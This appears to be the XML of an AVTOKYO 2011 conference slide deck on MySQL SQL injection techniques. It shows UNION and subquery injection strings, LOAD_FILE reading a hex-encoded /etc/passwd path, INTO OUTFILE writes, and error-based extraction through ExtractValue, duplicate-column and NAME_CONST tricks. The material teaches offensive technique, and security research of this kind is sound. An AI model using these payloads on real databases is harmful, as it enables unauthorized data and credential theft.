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6" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="285" r:id="rId5"/>
    <p:sldId id="284" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="303" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="315" r:id="rId10"/>
    <p:sldId id="281" r:id="rId11"/>
    <p:sldId id="307" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="309" r:id="rId14"/>
    <p:sldId id="314" r:id="rId15"/>
    <p:sldId id="310" r:id="rId16"/>
    <p:sldId id="313" r:id="rId17"/>
    <p:sldId id="262" r:id="rId18"/>
    <p:sldId id="263" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="295" r:id="rId21"/>
    <p:sldId id="296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304" r:id="rId31"/>
    <p:sldId id="273" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="297" r:id="rId34"/>
    <p:sldId id="298" r:id="rId35"/>
    <p:sldId id="305" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="277" r:id="rId38"/>
    <p:sldId id="289" r:id="rId39"/>
    <p:sldId id="294" r:id="rId40"/>
    <p:sldId id="290" r:id="rId41"/>
    <p:sldId id="291" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="293" r:id="rId44"/>
    <p:sldId id="316" r:id="rId45"/>
    <p:sldId id="283" r:id="rId46"/>
    <p:sldId id="288" r:id="rId47"/>
    <p:sldId id="282" r:id="rId48"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
      <p:regular r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
      <p:regular r:id="rId50"/>
    </p:embeddedFon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微軟正黑體" pitchFamily="34" charset="-120"/>
      <p:regular r:id="rId55"/>
      <p:bold r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Ariendezze" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="helvetica" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId6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7" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73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9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0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86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4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3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1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49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31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98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rgbClr val="E6E6E6"/>
            </a:gs>
            <a:gs pos="0">
              <a:srgbClr val="7D8496"/>
            </a:gs>
            <a:gs pos="0">
              <a:schemeClr val="bg1">
                <a:lumMod val="60000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="10000">
              <a:schemeClr val="bg1">
                <a:lumMod val="60000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="88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DA29-590C-435E-9499-C5FC938A521C}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2011/11/11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982F-5765-4E87-AD74-9D4C41F84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7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SQL Injection from Past to Now</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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pPr algn="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Orange@chroot.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/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pitchFamily="34" charset="-128"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>AVTOKYO 2011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Hiragino Sans GB W3" pitchFamily="34" charset="-128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Hacker-Friendly Features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12048"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1389682" y="1590558"/>
          <a:ext cx="6364636" cy="503292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182318"/>
                <a:gridCol w="3182318"/>
              </a:tblGrid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Feature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70718" marR="70718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MySQL Series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70718" marR="70718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Unions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4.0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Subqueries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4.1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R-trees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4.1 (for the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>MyISAM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> storage engine)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Stored procedures and functions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5.0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Views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5.0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Cursors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 dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW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XA transactions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5.0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Triggers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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5.0 and 5.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Event scheduler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5.1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Partitioning</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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5.1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Pluggable storage engine API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5.1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Plugin API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5.1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InnoDB Plugin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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5.1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Row-based replication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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="160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  <a:tr h="2828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Server log tables</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="helvetica"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36832" marR="36832" marT="35359" marB="35359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9063" y="15906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1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UNION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UNION is available from MySQL 4 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?id=-1337 ORDER BY …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?id=-1337 UNION SELECT …… FROM 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5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Sub Queries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Sub-Query is added in MySQL 4.1.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?id=-1337 AND (SELECT 1)=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?id=-1337 AND EXISTS (SELECT * FROM [users])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14839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Password Hashing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PASSWORD function was updated in MySQL 4.1.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OLD_PASSWORD() -&gt; PASSWORD()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
              <a:t>34E0FA4249E39734</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
              <a:t>*0385CA55F9876160B8A380E9938EB9F59C86D400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>There is collision in OLD_PASSWORD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
              <a:t>OLD_PASSWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
              <a:t>( 'Orange.8361</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
              <a:t>' )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
              <a:t>OLD_PASSWORD( '!_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" err="1"/>
              <a:t>n:tB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
              <a:t>&lt;d($|"b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
              <a:t>&gt;' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4005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Information Schema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Information Schema is starting from MySQL 5.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INFORMATION_SCHEMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SCHEMATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>TABLES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>COLUMNS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2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User-Defined Function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exists originally in MySQL.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After MySQL 4.1.25, shared library must be in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>PLUGIN_DIR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SYSTEM PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CREATE FUNCTION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2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File Input / Output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exists originally in MySQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>LOAD_FILE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>LOAD_FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>( '/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' )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>LOAD_FILE( 0x2f6574632f706173737764 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>INTO OUTFILE / DUMPFILE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SELECT … INTO OUTFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>'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/.a'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2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New Trick in MySQL Injection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Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Obtaining Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Error Based Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Hack MySQL Deeply</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>MySQL Triggers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"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3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Error Based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I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njection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Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>It like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>njection in Microsoft SQL server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>When to use ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>INSERT / UPDATE Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cross table query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>No data shown on web page after a SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>How to implement ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Function Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Duplicate Error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32264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Function Error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MySQL XML functions (MySQL &gt; 5.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ExtractValue</a:t>
            </a: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 err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>xml_frag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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xpath_expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>UpdateXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>xml_target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>xpath_expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>new_xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt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8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zh-TW" altLang="en-US" sz="1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中行書繁" pitchFamily="2" charset="-120"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>奇技淫巧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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中行書繁" pitchFamily="2" charset="-120"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW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中行書繁" pitchFamily="2" charset="-120"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
            </a:b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中行書繁" pitchFamily="2" charset="-120"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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中行書繁" pitchFamily="2" charset="-120"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW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中行書繁" pitchFamily="2" charset="-120"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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endezze" pitchFamily="34" charset="0"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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endezze" pitchFamily="34" charset="0"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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endezze" pitchFamily="34" charset="0"/>
                <a:ea typeface="王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>Injection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王漢宗中行書繁" pitchFamily="2" charset="-120"/>
              <a:ea typeface="王漢宗中行書繁" pitchFamily="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pPr algn="r"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128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7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Select 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</a:b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extractValue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( 1, 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concat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( 0x3c, user() ) )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XPATH syntax error: '&lt;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root@localhost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'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Duplicate Error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Duplicate Column</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Duplicate Entry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52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Select * from (Select 1,1) as x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Duplicate column name '1'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9794"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="4863048"/>
          <a:ext cx="6096000" cy="11582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Select * from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(select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* from user as a join user as b) as x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Duplicate column name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iragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>'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username'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48137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="515888" y="4581128"/>
          <a:ext cx="3696072" cy="11582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848036"/>
                <a:gridCol w="1848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username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password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…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…</a:t>
                      </a:r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9283"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4932040" y="4581128"/>
          <a:ext cx="3696072" cy="11582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848036"/>
                <a:gridCol w="1848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username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password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…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…</a:t>
                      </a:r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4283968" y="4645585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+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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7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iragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Select * from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iragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(select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iragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>* from user as a join user as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iragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>b using(username))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iragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>as x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Duplicate column name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iragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>'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password'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53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Select * from (select user(),user()) as x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Will it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show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MySQL current user name?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9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No !!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Duplicate column name 'user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iragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>()'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99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NAME_CONST(name ,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value)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NAME_CONST() causes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the column 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to have the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given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name.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3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Select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/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NAME_CONST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( 'QB1', 1 ),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/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NAME_CONST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( 'QB2', 2 )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</a:b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93052"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547664" y="4559528"/>
          <a:ext cx="6096000" cy="11582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QB1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="Hiragino Sans GB W6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QB2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="Hiragino Sans GB W6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>
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="Hiragino Sans GB W6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>
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="Hiragino Sans GB W6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Select * from ( Select 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NAME_CONST( user(), 1 ),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 NAME_CONST( user(), 1 ) )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as x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Duplicate column name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'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root@localhost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'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0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Cheng-Da Tsai (aka Orange)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>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Come from Taiwan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A Student S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>tudied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> in University now.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Major in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows Vulnerability Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CHROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Security Group Member</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Hacks in Taiwan Conference Member</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980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But !!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128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9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MySQL patch it since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5.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1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Argument of NAME_CONST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must be const.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
